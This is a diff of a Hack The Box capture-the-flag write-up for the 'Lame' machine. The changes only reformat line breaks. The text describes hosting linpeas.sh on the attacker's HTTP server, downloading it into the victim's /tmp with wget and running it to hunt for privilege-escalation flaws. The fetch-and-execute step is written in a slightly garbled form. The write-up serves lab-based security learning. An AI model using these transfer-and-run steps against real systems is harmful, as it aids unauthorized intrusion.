Shellshock9001/HTB_Writeups/Lame/Lame.md

 ![image](https://user-images.githubusercontent.com/110210595/185814191-f868ba55-884e-4c9e-ba39-267b4ee7455c.png)

-Next, let's head over to the tmp directory and try to transfer over some enumeration files like linpeas.sh \
+Next, let's head over to the tmp directory and try to transfer over some enumeration files like linpeas.sh<br>
-I go to my attacking machine on my transfers directory where I store all my enumeration files, scripts, images, anything that can be used to help us get an edge on the victim machine. \
+I go to my attacking machine on my transfers directory where I store all my enumeration files, scripts, images, anything that can be used to help us get an edge on the victim machine.<br>
-I use python3 -m http.server 80 get the server up and running. \
+I use python3 -m http.server 80 get the server up and running.<br>
-On the victim machine ill be in the /tmp directory and use wget://10.10.14.10/linpeas.sh which is my attacking machines ip from HackTheBox. \
+On the victim machine ill be in the /tmp directory and use wget://10.10.14.10/linpeas.sh which is my attacking machines ip from HackTheBox.<br>
 The file gets transferred over no problem.
-I use the chmod +x linpeas.sh making it an executable file. \
+I use the chmod +x linpeas.sh making it an executable file.<br>
 I use ./linpeas.sh and it kicks off no problem.
 We get back a lot of results.
 Several vulnerabilities, but one in particular catches my eye with the yellow red highlight.

 ![image](https://user-images.githubusercontent.com/110210595/185814232-c92b51cf-c297-46b9-ad1f-ed45077f1d5d.png)